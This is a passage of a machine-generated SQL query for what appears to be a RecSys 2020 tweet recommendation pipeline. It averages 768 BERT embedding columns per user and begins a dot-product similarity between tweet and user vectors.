avg(gap_307) as gap_307,
avg(gap_308) as gap_308,
avg(gap_309) as gap_309,
avg(gap_310) as gap_310,
avg(gap_311) as gap_311,
avg(gap_312) as gap_312,
avg(gap_313) as gap_313,
avg(gap_314) as gap_314,
avg(gap_315) as gap_315,
avg(gap_316) as gap_316,
avg(gap_317) as gap_317,
avg(gap_318) as gap_318,
avg(gap_319) as gap_319,
avg(gap_320) as gap_320,
avg(gap_321) as gap_321,
avg(gap_322) as gap_322,
avg(gap_323) as gap_323,
avg(gap_324) as gap_324,
avg(gap_325) as gap_325,
avg(gap_326) as gap_326,
avg(gap_327) as gap_327,
avg(gap_328) as gap_328,
avg(gap_329) as gap_329,
avg(gap_330) as gap_330,
avg(gap_331) as gap_331,
avg(gap_332) as gap_332,
avg(gap_333) as gap_333,
avg(gap_334) as gap_334,
avg(gap_335) as gap_335,
avg(gap_336) as gap_336,
avg(gap_337) as gap_337,
avg(gap_338) as gap_338,
avg(gap_339) as gap_339,
avg(gap_340) as gap_340,
avg(gap_341) as gap_341,
avg(gap_342) as gap_342,
avg(gap_343) as gap_343,
avg(gap_344) as gap_344,
avg(gap_345) as gap_345,
avg(gap_346) as gap_346,
avg(gap_347) as gap_347,
avg(gap_348) as gap_348,
avg(gap_349) as gap_349,
avg(gap_350) as gap_350,
avg(gap_351) as gap_351,
avg(gap_352) as gap_352,
avg(gap_353) as gap_353,
avg(gap_354) as gap_354,
avg(gap_355) as gap_355,
avg(gap_356) as gap_356,
avg(gap_357) as gap_357,
avg(gap_358) as gap_358,
avg(gap_359) as gap_359,
avg(gap_360) as gap_360,
avg(gap_361) as gap_361,
avg(gap_362) as gap_362,
avg(gap_363) as gap_363,
avg(gap_364) as gap_364,
avg(gap_365) as gap_365,
avg(gap_366) as gap_366,
avg(gap_367) as gap_367,
avg(gap_368) as gap_368,
avg(gap_369) as gap_369,
avg(gap_370) as gap_370,
avg(gap_371) as gap_371,
avg(gap_372) as gap_372,
avg(gap_373) as gap_373,
avg(gap_374) as gap_374,
avg(gap_375) as gap_375,
avg(gap_376) as gap_376,
avg(gap_377) as gap_377,
avg(gap_378) as gap_378,
avg(gap_379) as gap_379,
avg(gap_380) as gap_380,
avg(gap_381) as gap_381,
avg(gap_382) as gap_382,
avg(gap_383) as gap_383,
avg(gap_384) as gap_384,
avg(gap_385) as gap_385,
avg(gap_386) as gap_386,
avg(gap_387) as gap_387,
avg(gap_388) as gap_388,
avg(gap_389) as gap_389,
avg(gap_390) as gap_390,
avg(gap_391) as gap_391,
avg(gap_392) as gap_392,
avg(gap_393) as gap_393,
avg(gap_394) as gap_394,
avg(gap_395) as gap_395,
avg(gap_396) as gap_396,
avg(gap_397) as gap_397,
avg(gap_398) as gap_398,
avg(gap_399) as gap_399,
avg(gap_400) as gap_400,
avg(gap_401) as gap_401,
avg(gap_402) as gap_402,
avg(gap_403) as gap_403,
avg(gap_404) as gap_404,
avg(gap_405) as gap_405,
avg(gap_406) as gap_406,
avg(gap_407) as gap_407,
avg(gap_408) as gap_408,
avg(gap_409) as gap_409,
avg(gap_410) as gap_410,
avg(gap_411) as gap_411,
avg(gap_412) as gap_412,
avg(gap_413) as gap_413,
avg(gap_414) as gap_414,
avg(gap_415) as gap_415,
avg(gap_416) as gap_416,
avg(gap_417) as gap_417,
avg(gap_418) as gap_418,
avg(gap_419) as gap_419,
avg(gap_420) as gap_420,
avg(gap_421) as gap_421,
avg(gap_422) as gap_422,
avg(gap_423) as gap_423,
avg(gap_424) as gap_424,
avg(gap_425) as gap_425,
avg(gap_426) as gap_426,
avg(gap_427) as gap_427,
avg(gap_428) as gap_428,
avg(gap_429) as gap_429,
avg(gap_430) as gap_430,
avg(gap_431) as gap_431,
avg(gap_432) as gap_432,
avg(gap_433) as gap_433,
avg(gap_434) as gap_434,
avg(gap_435) as gap_435,
avg(gap_436) as gap_436,
avg(gap_437) as gap_437,
avg(gap_438) as gap_438,
avg(gap_439) as gap_439,
avg(gap_440) as gap_440,
avg(gap_441) as gap_441,
avg(gap_442) as gap_442,
avg(gap_443) as gap_443,
avg(gap_444) as gap_444,
avg(gap_445) as gap_445,
avg(gap_446) as gap_446,
avg(gap_447) as gap_447,
avg(gap_448) as gap_448,
avg(gap_449) as gap_449,
avg(gap_450) as gap_450,
avg(gap_451) as gap_451,
avg(gap_452) as gap_452,
avg(gap_453) as gap_453,
avg(gap_454) as gap_454,
avg(gap_455) as gap_455,
avg(gap_456) as gap_456,
avg(gap_457) as gap_457,
avg(gap_458) as gap_458,
avg(gap_459) as gap_459,
avg(gap_460) as gap_460,
avg(gap_461) as gap_461,
avg(gap_462) as gap_462,
avg(gap_463) as gap_463,
avg(gap_464) as gap_464,
avg(gap_465) as gap_465,
avg(gap_466) as gap_466,
avg(gap_467) as gap_467,
avg(gap_468) as gap_468,
avg(gap_469) as gap_469,
avg(gap_470) as gap_470,
avg(gap_471) as gap_471,
avg(gap_472) as gap_472,
avg(gap_473) as gap_473,
avg(gap_474) as gap_474,
avg(gap_475) as gap_475,
avg(gap_476) as gap_476,
avg(gap_477) as gap_477,
avg(gap_478) as gap_478,
avg(gap_479) as gap_479,
avg(gap_480) as gap_480,
avg(gap_481) as gap_481,
avg(gap_482) as gap_482,
avg(gap_483) as gap_483,
avg(gap_484) as gap_484,
avg(gap_485) as gap_485,
avg(gap_486) as gap_486,
avg(gap_487) as gap_487,
avg(gap_488) as gap_488,
avg(gap_489) as gap_489,
avg(gap_490) as gap_490,
avg(gap_491) as gap_491,
avg(gap_492) as gap_492,
avg(gap_493) as gap_493,
avg(gap_494) as gap_494,
avg(gap_495) as gap_495,
avg(gap_496) as gap_496,
avg(gap_497) as gap_497,
avg(gap_498) as gap_498,
avg(gap_499) as gap_499,
avg(gap_500) as gap_500,
avg(gap_501) as gap_501,
avg(gap_502) as gap_502,
avg(gap_503) as gap_503,
avg(gap_504) as gap_504,
avg(gap_505) as gap_505,
avg(gap_506) as gap_506,
avg(gap_507) as gap_507,
avg(gap_508) as gap_508,
avg(gap_509) as gap_509,
avg(gap_510) as gap_510,
avg(gap_511) as gap_511,
avg(gap_512) as gap_512,
avg(gap_513) as gap_513,
avg(gap_514) as gap_514,
avg(gap_515) as gap_515,
avg(gap_516) as gap_516,
avg(gap_517) as gap_517,
avg(gap_518) as gap_518,
avg(gap_519) as gap_519,
avg(gap_520) as gap_520,
avg(gap_521) as gap_521,
avg(gap_522) as gap_522,
avg(gap_523) as gap_523,
avg(gap_524) as gap_524,
avg(gap_525) as gap_525,
avg(gap_526) as gap_526,
avg(gap_527) as gap_527,
avg(gap_528) as gap_528,
avg(gap_529) as gap_529,
avg(gap_530) as gap_530,
avg(gap_531) as gap_531,
avg(gap_532) as gap_532,
avg(gap_533) as gap_533,
avg(gap_534) as gap_534,
avg(gap_535) as gap_535,
avg(gap_536) as gap_536,
avg(gap_537) as gap_537,
avg(gap_538) as gap_538,
avg(gap_539) as gap_539,
avg(gap_540) as gap_540,
avg(gap_541) as gap_541,
avg(gap_542) as gap_542,
avg(gap_543) as gap_543,
avg(gap_544) as gap_544,
avg(gap_545) as gap_545,
avg(gap_546) as gap_546,
avg(gap_547) as gap_547,
avg(gap_548) as gap_548,
avg(gap_549) as gap_549,
avg(gap_550) as gap_550,
avg(gap_551) as gap_551,
avg(gap_552) as gap_552,
avg(gap_553) as gap_553,
avg(gap_554) as gap_554,
avg(gap_555) as gap_555,
avg(gap_556) as gap_556,
avg(gap_557) as gap_557,
avg(gap_558) as gap_558,
avg(gap_559) as gap_559,
avg(gap_560) as gap_560,
avg(gap_561) as gap_561,
avg(gap_562) as gap_562,
avg(gap_563) as gap_563,
avg(gap_564) as gap_564,
avg(gap_565) as gap_565,
avg(gap_566) as gap_566,
avg(gap_567) as gap_567,
avg(gap_568) as gap_568,
avg(gap_569) as gap_569,
avg(gap_570) as gap_570,
avg(gap_571) as gap_571,
avg(gap_572) as gap_572,
avg(gap_573) as gap_573,
avg(gap_574) as gap_574,
avg(gap_575) as gap_575,
avg(gap_576) as gap_576,
avg(gap_577) as gap_577,
avg(gap_578) as gap_578,
avg(gap_579) as gap_579,
avg(gap_580) as gap_580,
avg(gap_581) as gap_581,
avg(gap_582) as gap_582,
avg(gap_583) as gap_583,
avg(gap_584) as gap_584,
avg(gap_585) as gap_585,
avg(gap_586) as gap_586,
avg(gap_587) as gap_587,
avg(gap_588) as gap_588,
avg(gap_589) as gap_589,
avg(gap_590) as gap_590,
avg(gap_591) as gap_591,
avg(gap_592) as gap_592,
avg(gap_593) as gap_593,
avg(gap_594) as gap_594,
avg(gap_595) as gap_595,
avg(gap_596) as gap_596,
avg(gap_597) as gap_597,
avg(gap_598) as gap_598,
avg(gap_599) as gap_599,
avg(gap_600) as gap_600,
avg(gap_601) as gap_601,
avg(gap_602) as gap_602,
avg(gap_603) as gap_603,
avg(gap_604) as gap_604,
avg(gap_605) as gap_605,
avg(gap_606) as gap_606,
avg(gap_607) as gap_607,
avg(gap_608) as gap_608,
avg(gap_609) as gap_609,
avg(gap_610) as gap_610,
avg(gap_611) as gap_611,
avg(gap_612) as gap_612,
avg(gap_613) as gap_613,
avg(gap_614) as gap_614,
avg(gap_615) as gap_615,
avg(gap_616) as gap_616,
avg(gap_617) as gap_617,
avg(gap_618) as gap_618,
avg(gap_619) as gap_619,
avg(gap_620) as gap_620,
avg(gap_621) as gap_621,
avg(gap_622) as gap_622,
avg(gap_623) as gap_623,
avg(gap_624) as gap_624,
avg(gap_625) as gap_625,
avg(gap_626) as gap_626,
avg(gap_627) as gap_627,
avg(gap_628) as gap_628,
avg(gap_629) as gap_629,
avg(gap_630) as gap_630,
avg(gap_631) as gap_631,
avg(gap_632) as gap_632,
avg(gap_633) as gap_633,
avg(gap_634) as gap_634,
avg(gap_635) as gap_635,
avg(gap_636) as gap_636,
avg(gap_637) as gap_637,
avg(gap_638) as gap_638,
avg(gap_639) as gap_639,
avg(gap_640) as gap_640,
avg(gap_641) as gap_641,
avg(gap_642) as gap_642,
avg(gap_643) as gap_643,
avg(gap_644) as gap_644,
avg(gap_645) as gap_645,
avg(gap_646) as gap_646,
avg(gap_647) as gap_647,
avg(gap_648) as gap_648,
avg(gap_649) as gap_649,
avg(gap_650) as gap_650,
avg(gap_651) as gap_651,
avg(gap_652) as gap_652,
avg(gap_653) as gap_653,
avg(gap_654) as gap_654,
avg(gap_655) as gap_655,
avg(gap_656) as gap_656,
avg(gap_657) as gap_657,
avg(gap_658) as gap_658,
avg(gap_659) as gap_659,
avg(gap_660) as gap_660,
avg(gap_661) as gap_661,
avg(gap_662) as gap_662,
avg(gap_663) as gap_663,
avg(gap_664) as gap_664,
avg(gap_665) as gap_665,
avg(gap_666) as gap_666,
avg(gap_667) as gap_667,
avg(gap_668) as gap_668,
avg(gap_669) as gap_669,
avg(gap_670) as gap_670,
avg(gap_671) as gap_671,
avg(gap_672) as gap_672,
avg(gap_673) as gap_673,
avg(gap_674) as gap_674,
avg(gap_675) as gap_675,
avg(gap_676) as gap_676,
avg(gap_677) as gap_677,
avg(gap_678) as gap_678,
avg(gap_679) as gap_679,
avg(gap_680) as gap_680,
avg(gap_681) as gap_681,
avg(gap_682) as gap_682,
avg(gap_683) as gap_683,
avg(gap_684) as gap_684,
avg(gap_685) as gap_685,
avg(gap_686) as gap_686,
avg(gap_687) as gap_687,
avg(gap_688) as gap_688,
avg(gap_689) as gap_689,
avg(gap_690) as gap_690,
avg(gap_691) as gap_691,
avg(gap_692) as gap_692,
avg(gap_693) as gap_693,
avg(gap_694) as gap_694,
avg(gap_695) as gap_695,
avg(gap_696) as gap_696,
avg(gap_697) as gap_697,
avg(gap_698) as gap_698,
avg(gap_699) as gap_699,
avg(gap_700) as gap_700,
avg(gap_701) as gap_701,
avg(gap_702) as gap_702,
avg(gap_703) as gap_703,
avg(gap_704) as gap_704,
avg(gap_705) as gap_705,
avg(gap_706) as gap_706,
avg(gap_707) as gap_707,
avg(gap_708) as gap_708,
avg(gap_709) as gap_709,
avg(gap_710) as gap_710,
avg(gap_711) as gap_711,
avg(gap_712) as gap_712,
avg(gap_713) as gap_713,
avg(gap_714) as gap_714,
avg(gap_715) as gap_715,
avg(gap_716) as gap_716,
avg(gap_717) as gap_717,
avg(gap_718) as gap_718,
avg(gap_719) as gap_719,
avg(gap_720) as gap_720,
avg(gap_721) as gap_721,
avg(gap_722) as gap_722,
avg(gap_723) as gap_723,
avg(gap_724) as gap_724,
avg(gap_725) as gap_725,
avg(gap_726) as gap_726,
avg(gap_727) as gap_727,
avg(gap_728) as gap_728,
avg(gap_729) as gap_729,
avg(gap_730) as gap_730,
avg(gap_731) as gap_731,
avg(gap_732) as gap_732,
avg(gap_733) as gap_733,
avg(gap_734) as gap_734,
avg(gap_735) as gap_735,
avg(gap_736) as gap_736,
avg(gap_737) as gap_737,
avg(gap_738) as gap_738,
avg(gap_739) as gap_739,
avg(gap_740) as gap_740,
avg(gap_741) as gap_741,
avg(gap_742) as gap_742,
avg(gap_743) as gap_743,
avg(gap_744) as gap_744,
avg(gap_745) as gap_745,
avg(gap_746) as gap_746,
avg(gap_747) as gap_747,
avg(gap_748) as gap_748,
avg(gap_749) as gap_749,
avg(gap_750) as gap_750,
avg(gap_751) as gap_751,
avg(gap_752) as gap_752,
avg(gap_753) as gap_753,
avg(gap_754) as gap_754,
avg(gap_755) as gap_755,
avg(gap_756) as gap_756,
avg(gap_757) as gap_757,
avg(gap_758) as gap_758,
avg(gap_759) as gap_759,
avg(gap_760) as gap_760,
avg(gap_761) as gap_761,
avg(gap_762) as gap_762,
avg(gap_763) as gap_763,
avg(gap_764) as gap_764,
avg(gap_765) as gap_765,
avg(gap_766) as gap_766,
avg(gap_767) as gap_767
from surfacing_tweets
inner join `recsys2020.pretrained_bert_gap` gap on surfacing_tweets.tweet_id = gap.tweet_id
group by user_id
)
select
1.0 / 768 * (
(tweet_gap.gap_0 * user_surfacing_tweet_vectors.gap_0) +
(tweet_gap.gap_1 * user_surfacing_tweet_vectors.gap_1) +
(tweet_gap.gap_2 * user_surfacing_tweet_vectors.gap_2) +
(tweet_gap.gap_3 * user_surfacing_tweet_vectors.gap_3) +
(tweet_gap.gap_4 * user_surfacing_tweet_vectors.gap_4) +
(tweet_gap.gap_5 * user_surfacing_tweet_vectors.gap_5) +
(tweet_gap.gap_6 * user_surfacing_tweet_vectors.gap_6) +
(tweet_gap.gap_7 * user_surfacing_tweet_vectors.gap_7) +
(tweet_gap.gap_8 * user_surfacing_tweet_vectors.gap_8) +
(tweet_gap.gap_9 * user_surfacing_tweet_vectors.gap_9) +
(tweet_gap.gap_10 * user_surfacing_tweet_vectors.gap_10) +
(tweet_gap.gap_11 * user_surfacing_tweet_vectors.gap_11) +
(tweet_gap.gap_12 * user_surfacing_tweet_vectors.gap_12) +
(tweet_gap.gap_13 * user_surfacing_tweet_vectors.gap_13) +
(tweet_gap.gap_14 * user_surfacing_tweet_vectors.gap_14) +
(tweet_gap.gap_15 * user_surfacing_tweet_vectors.gap_15) +
(tweet_gap.gap_16 * user_surfacing_tweet_vectors.gap_16) +
(tweet_gap.gap_17 * user_surfacing_tweet_vectors.gap_17) +
(tweet_gap.gap_18 * user_surfacing_tweet_vectors.gap_18) +
(tweet_gap.gap_19 * user_surfacing_tweet_vectors.gap_19) +
(tweet_gap.gap_20 * user_surfacing_tweet_vectors.gap_20) +
(tweet_gap.gap_21 * user_surfacing_tweet_vectors.gap_21) +
(tweet_gap.gap_22 * user_surfacing_tweet_vectors.gap_22) +
(tweet_gap.gap_23 * user_surfacing_tweet_vectors.gap_23) +
(tweet_gap.gap_24 * user_surfacing_tweet_vectors.gap_24) +
(tweet_gap.gap_25 * user_surfacing_tweet_vectors.gap_25) +
(tweet_gap.gap_26 * user_surfacing_tweet_vectors.gap_26) +
(tweet_gap.gap_27 * user_surfacing_tweet_vectors.gap_27) +
(tweet_gap.gap_28 * user_surfacing_tweet_vectors.gap_28) +
(tweet_gap.gap_29 * user_surfacing_tweet_vectors.gap_29) +
(tweet_gap.gap_30 * user_surfacing_tweet_vectors.gap_30) +
(tweet_gap.gap_31 * user_surfacing_tweet_vectors.gap_31) +
(tweet_gap.gap_32 * user_surfacing_tweet_vectors.gap_32) +
(tweet_gap.gap_33 * user_surfacing_tweet_vectors.gap_33) +
(tweet_gap.gap_34 * user_surfacing_tweet_vectors.gap_34) +
(tweet_gap.gap_35 * user_surfacing_tweet_vectors.gap_35) +
(tweet_gap.gap_36 * user_surfacing_tweet_vectors.gap_36) +
(tweet_gap.gap_37 * user_surfacing_tweet_vectors.gap_37) +
(tweet_gap.gap_38 * user_surfacing_tweet_vectors.gap_38) +
(tweet_gap.gap_39 * user_surfacing_tweet_vectors.gap_39) +
(tweet_gap.gap_40 * user_surfacing_tweet_vectors.gap_40) +
(tweet_gap.gap_41 * user_surfacing_tweet_vectors.gap_41) +
(tweet_gap.gap_42 * user_surfacing_tweet_vectors.gap_42) +
(tweet_gap.gap_43 * user_surfacing_tweet_vectors.gap_43) +
(tweet_gap.gap_44 * user_surfacing_tweet_vectors.gap_44) +
(tweet_gap.gap_45 * user_surfacing_tweet_vectors.gap_45) +
(tweet_gap.gap_46 * user_surfacing_tweet_vectors.gap_46) +
(tweet_gap.gap_47 * user_surfacing_tweet_vectors.gap_47) +
(tweet_gap.gap_48 * user_surfacing_tweet_vectors.gap_48) +
(tweet_gap.gap_49 * user_surfacing_tweet_vectors.gap_49) +
(tweet_gap.gap_50 * user_surfacing_tweet_vectors.gap_50) +
(tweet_gap.gap_51 * user_surfacing_tweet_vectors.gap_51) +
(tweet_gap.gap_52 * user_surfacing_tweet_vectors.gap_52) +
(tweet_gap.gap_53 * user_surfacing_tweet_vectors.gap_53) +
(tweet_gap.gap_54 * user_surfacing_tweet_vectors.gap_54) +
(tweet_gap.gap_55 * user_surfacing_tweet_vectors.gap_55) +
(tweet_gap.gap_56 * user_surfacing_tweet_vectors.gap_56) +
(tweet_gap.gap_57 * user_surfacing_tweet_vectors.gap_57) +
(tweet_gap.gap_58 * user_surfacing_tweet_vectors.gap_58) +
(tweet_gap.gap_59 * user_surfacing_tweet_vectors.gap_59) +
(tweet_gap.gap_60 * user_surfacing_tweet_vectors.gap_60) +
(tweet_gap.gap_61 * user_surfacing_tweet_vectors.gap_61) +
(tweet_gap.gap_62 * user_surfacing_tweet_vectors.gap_62) +
(tweet_gap.gap_63 * user_surfacing_tweet_vectors.gap_63) +
(tweet_gap.gap_64 * user_surfacing_tweet_vectors.gap_64) +
(tweet_gap.gap_65 * user_surfacing_tweet_vectors.gap_65) +
(tweet_gap.gap_66 * user_surfacing_tweet_vectors.gap_66) +
(tweet_gap.gap_67 * user_surfacing_tweet_vectors.gap_67) +
(tweet_gap.gap_68 * user_surfacing_tweet_vectors.gap_68) +
(tweet_gap.gap_69 * user_surfacing_tweet_vectors.gap_69) +
(tweet_gap.gap_70 * user_surfacing_tweet_vectors.gap_70) +
(tweet_gap.gap_71 * user_surfacing_tweet_vectors.gap_71) +
(tweet_gap.gap_72 * user_surfacing_tweet_vectors.gap_72) +
(tweet_gap.gap_73 * user_surfacing_tweet_vectors.gap_73) +
(tweet_gap.gap_74 * user_surfacing_tweet_vectors.gap_74) +
(tweet_gap.gap_75 * user_surfacing_tweet_vectors.gap_75) +
(tweet_gap.gap_76 * user_surfacing_tweet_vectors.gap_76) +
(tweet_gap.gap_77 * user_surfacing_tweet_vectors.gap_77) +
(tweet_gap.gap_78 * user_surfacing_tweet_vectors.gap_78) +
(tweet_gap.gap_79 * user_surfacing_tweet_vectors.gap_79) +
(tweet_gap.gap_80 * user_surfacing_tweet_vectors.gap_80) +
(tweet_gap.gap_81 * user_surfacing_tweet_vectors.gap_81) +
(tweet_gap.gap_82 * user_surfacing_tweet_vectors.gap_82) +
(tweet_gap.gap_83 * user_surfacing_tweet_vectors.gap_83) +
(tweet_gap.gap_84 * user_surfacing_tweet_vectors.gap_84) +
(tweet_gap.gap_85 * user_surfacing_tweet_vectors.gap_85) +
(tweet_gap.gap_86 * user_surfacing_tweet_vectors.gap_86) +
(tweet_gap.gap_87 * user_surfacing_tweet_vectors.gap_87) +
(tweet_gap.gap_88 * user_surfacing_tweet_vectors.gap_88) +
(tweet_gap.gap_89 * user_surfacing_tweet_vectors.gap_89) +
(tweet_gap.gap_90 * user_surfacing_tweet_vectors.gap_90) +
(tweet_gap.gap_91 * user_surfacing_tweet_vectors.gap_91) +
(tweet_gap.gap_92 * user_surfacing_tweet_vectors.gap_92) +
(tweet_gap.gap_93 * user_surfacing_tweet_vectors.gap_93) +
(tweet_gap.gap_94 * user_surfacing_tweet_vectors.gap_94) +
(tweet_gap.gap_95 * user_surfacing_tweet_vectors.gap_95) +
(tweet_gap.gap_96 * user_surfacing_tweet_vectors.gap_96) +
(tweet_gap.gap_97 * user_surfacing_tweet_vectors.gap_97) +
(tweet_gap.gap_98 * user_surfacing_tweet_vectors.gap_98) +
(tweet_gap.gap_99 * user_surfacing_tweet_vectors.gap_99) +
(tweet_gap.gap_100 * user_surfacing_tweet_vectors.gap_100) +
(tweet_gap.gap_101 * user_surfacing_tweet_vectors.gap_101) +
(tweet_gap.gap_102 * user_surfacing_tweet_vectors.gap_102) +
(tweet_gap.gap_103 * user_surfacing_tweet_vectors.gap_103) +
(tweet_gap.gap_104 * user_surfacing_tweet_vectors.gap_104) +
(tweet_gap.gap_105 * user_surfacing_tweet_vectors.gap_105) +
(tweet_gap.gap_106 * user_surfacing_tweet_vectors.gap_106) +
(tweet_gap.gap_107 * user_surfacing_tweet_vectors.gap_107) +
(tweet_gap.gap_108 * user_surfacing_tweet_vectors.gap_108) +
(tweet_gap.gap_109 * user_surfacing_tweet_vectors.gap_109) +
(tweet_gap.gap_110 * user_surfacing_tweet_vectors.gap_110) +
(tweet_gap.gap_111 * user_surfacing_tweet_vectors.gap_111) +
(tweet_gap.gap_112 * user_surfacing_tweet_vectors.gap_112) +
(tweet_gap.gap_113 * user_surfacing_tweet_vectors.gap_113) +
(tweet_gap.gap_114 * user_surfacing_tweet_vectors.gap_114) +
(tweet_gap.gap_115 * user_surfacing_tweet_vectors.gap_115) +
(tweet_gap.gap_116 * user_surfacing_tweet_vectors.gap_116) +
(tweet_gap.gap_117 * user_surfacing_tweet_vectors.gap_117) +
(tweet_gap.gap_118 * user_surfacing_tweet_vectors.gap_118) +
(tweet_gap.gap_119 * user_surfacing_tweet_vectors.gap_119) +
(tweet_gap.gap_120 * user_surfacing_tweet_vectors.gap_120) +
(tweet_gap.gap_121 * user_surfacing_tweet_vectors.gap_121) +
(tweet_gap.gap_122 * user_surfacing_tweet_vectors.gap_122) +
(tweet_gap.gap_123 * user_surfacing_tweet_vectors.gap_123) +
(tweet_gap.gap_124 * user_surfacing_tweet_vectors.gap_124) +
(tweet_gap.gap_125 * user_surfacing_tweet_vectors.gap_125) +
(tweet_gap.gap_126 * user_surfacing_tweet_vectors.gap_126) +
(tweet_gap.gap_127 * user_surfacing_tweet_vectors.gap_127) +
(tweet_gap.gap_128 * user_surfacing_tweet_vectors.gap_128) +
(tweet_gap.gap_129 * user_surfacing_tweet_vectors.gap_129) +
(tweet_gap.gap_130 * user_surfacing_tweet_vectors.gap_130) +
(tweet_gap.gap_131 * user_surfacing_tweet_vectors.gap_131) +
(tweet_gap.gap_132 * user_surfacing_tweet_vectors.gap_132) +
(tweet_gap.gap_133 * user_surfacing_tweet_vectors.gap_133) +
(tweet_gap.gap_134 * user_surfacing_tweet_vectors.gap_134) +
(tweet_gap.gap_135 * user_surfacing_tweet_vectors.gap_135) +
(tweet_gap.gap_136 * user_surfacing_tweet_vectors.gap_136) +
(tweet_gap.gap_137 * user_surfacing_tweet_vectors.gap_137) +
(tweet_gap.gap_138 * user_surfacing_tweet_vectors.gap_138) +
(tweet_gap.gap_139 * user_surfacing_tweet_vectors.gap_139) +
(tweet_gap.gap_140 * user_surfacing_tweet_vectors.gap_140) +
(tweet_gap.gap_141 * user_surfacing_tweet_vectors.gap_141) +
(tweet_gap.gap_142 * user_surfacing_tweet_vectors.gap_142) +
(tweet_gap.gap_143 * user_surfacing_tweet_vectors.gap_143) +
(tweet_gap.gap_144 * user_surfacing_tweet_vectors.gap_144) +
(tweet_gap.gap_145 * user_surfacing_tweet_vectors.gap_145) +
(tweet_gap.gap_146 * user_surfacing_tweet_vectors.gap_146) +
(tweet_gap.gap_147 * user_surfacing_tweet_vectors.gap_147) +
(tweet_gap.gap_148 * user_surfacing_tweet_vectors.gap_148) +
(tweet_gap.gap_149 * user_surfacing_tweet_vectors.gap_149) +
(tweet_gap.gap_150 * user_surfacing_tweet_vectors.gap_150) +
(tweet_gap.gap_151 * user_surfacing_tweet_vectors.gap_151) +
(tweet_gap.gap_152 * user_surfacing_tweet_vectors.gap_152) +
(tweet_gap.gap_153 * user_surfacing_tweet_vectors.gap_153) +
(tweet_gap.gap_154 * user_surfacing_tweet_vectors.gap_154) +
(tweet_gap.gap_155 * user_surfacing_tweet_vectors.gap_155) +
(tweet_gap.gap_156 * user_surfacing_tweet_vectors.gap_156) +
(tweet_gap.gap_157 * user_surfacing_tweet_vectors.gap_157) +
(tweet_gap.gap_158 * user_surfacing_tweet_vectors.gap_158) +
(tweet_gap.gap_159 * user_surfacing_tweet_vectors.gap_159) +
(tweet_gap.gap_160 * user_surfacing_tweet_vectors.gap_160) +
(tweet_gap.gap_161 * user_surfacing_tweet_vectors.gap_161) +
(tweet_gap.gap_162 * user_surfacing_tweet_vectors.gap_162) +
(tweet_gap.gap_163 * user_surfacing_tweet_vectors.gap_163) +
(tweet_gap.gap_164 * user_surfacing_tweet_vectors.gap_164) +
(tweet_gap.gap_165 * user_surfacing_tweet_vectors.gap_165) +
(tweet_gap.gap_166 * user_surfacing_tweet_vectors.gap_166) +
(tweet_gap.gap_167 * user_surfacing_tweet_vectors.gap_167) +
(tweet_gap.gap_168 * user_surfacing_tweet_vectors.gap_168) +
(tweet_gap.gap_169 * user_surfacing_tweet_vectors.gap_169) +
(tweet_gap.gap_170 * user_surfacing_tweet_vectors.gap_170) +
(tweet_gap.gap_171 * user_surfacing_tweet_vectors.gap_171) +
(tweet_gap.gap_172 * user_surfacing_tweet_vectors.gap_172) +
(tweet_gap.gap_173 * user_surfacing_tweet_vectors.gap_173) +
(tweet_gap.gap_174 * user_surfacing_tweet_vectors.gap_174) +
(tweet_gap.gap_175 * user_surfacing_tweet_vectors.gap_175) +
(tweet_gap.gap_176 * user_surfacing_tweet_vectors.gap_176) +
(tweet_gap.gap_177 * user_surfacing_tweet_vectors.gap_177) +
(tweet_gap.gap_178 * user_surfacing_tweet_vectors.gap_178) +
(tweet_gap.gap_179 * user_surfacing_tweet_vectors.gap_179) +
(tweet_gap.gap_180 * user_surfacing_tweet_vectors.gap_180) +
(tweet_gap.gap_181 * user_surfacing_tweet_vectors.gap_181) +
(tweet_gap.gap_182 * user_surfacing_tweet_vectors.gap_182) +
(tweet_gap.gap_183 * user_surfacing_tweet_vectors.gap_183) +
(tweet_gap.gap_184 * user_surfacing_tweet_vectors.gap_184) +
(tweet_gap.gap_185 * user_surfacing_tweet_vectors.gap_185) +
(tweet_gap.gap_186 * user_surfacing_tweet_vectors.gap_186) +
(tweet_gap.gap_187 * user_surfacing_tweet_vectors.gap_187) +
(tweet_gap.gap_188 * user_surfacing_tweet_vectors.gap_188) +
(tweet_gap.gap_189 * user_surfacing_tweet_vectors.gap_189) +
(tweet_gap.gap_190 * user_surfacing_tweet_vectors.gap_190) +
(tweet_gap.gap_191 * user_surfacing_tweet_vectors.gap_191) +
(tweet_gap.gap_192 * user_surfacing_tweet_vectors.gap_192) +
(tweet_gap.gap_193 * user_surfacing_tweet_vectors.gap_193) +
(tweet_gap.gap_194 * user_surfacing_tweet_vectors.gap_194) +
(tweet_gap.gap_195 * user_surfacing_tweet_vectors.gap_195) +
(tweet_gap.gap_196 * user_surfacing_tweet_vectors.gap_196) +
(tweet_gap.gap_197 * user_surfacing_tweet_vectors.gap_197) +
(tweet_gap.gap_198 * user_surfacing_tweet_vectors.gap_198) +
(tweet_gap.gap_199 * user_surfacing_tweet_vectors.gap_199) +
(tweet_gap.gap_200 * user_surfacing_tweet_vectors.gap_200) +
(tweet_gap.gap_201 * user_surfacing_tweet_vectors.gap_201) +
(tweet_gap.gap_202 * user_surfacing_tweet_vectors.gap_202) +
(tweet_gap.gap_203 * user_surfacing_tweet_vectors.gap_203) +
(tweet_gap.gap_204 * user_surfacing_tweet_vectors.gap_204) +
(tweet_gap.gap_205 * user_surfacing_tweet_vectors.gap_205) +
(tweet_gap.gap_206 * user_surfacing_tweet_vectors.gap_206) +
(tweet_gap.gap_207 * user_surfacing_tweet_vectors.gap_207) +
(tweet_gap.gap_208 * user_surfacing_tweet_vectors.gap_208) +
(tweet_gap.gap_209 * user_surfacing_tweet_vectors.gap_209) +
(tweet_gap.gap_210 * user_surfacing_tweet_vectors.gap_210) +
(tweet_gap.gap_211 * user_surfacing_tweet_vectors.gap_211) +
(tweet_gap.gap_212 * user_surfacing_tweet_vectors.gap_212) +
(tweet_gap.gap_213 * user_surfacing_tweet_vectors.gap_213) +
(tweet_gap.gap_214 * user_surfacing_tweet_vectors.gap_214) +
(tweet_gap.gap_215 * user_surfacing_tweet_vectors.gap_215) +
(tweet_gap.gap_216 * user_surfacing_tweet_vectors.gap_216) +
(tweet_gap.gap_217 * user_surfacing_tweet_vectors.gap_217) +
(tweet_gap.gap_218 * user_surfacing_tweet_vectors.gap_218) +
(tweet_gap.gap_219 * user_surfacing_tweet_vectors.gap_219) +
(tweet_gap.gap_220 * user_surfacing_tweet_vectors.gap_220) +
(tweet_gap.gap_221 * user_surfacing_tweet_vectors.gap_221) +
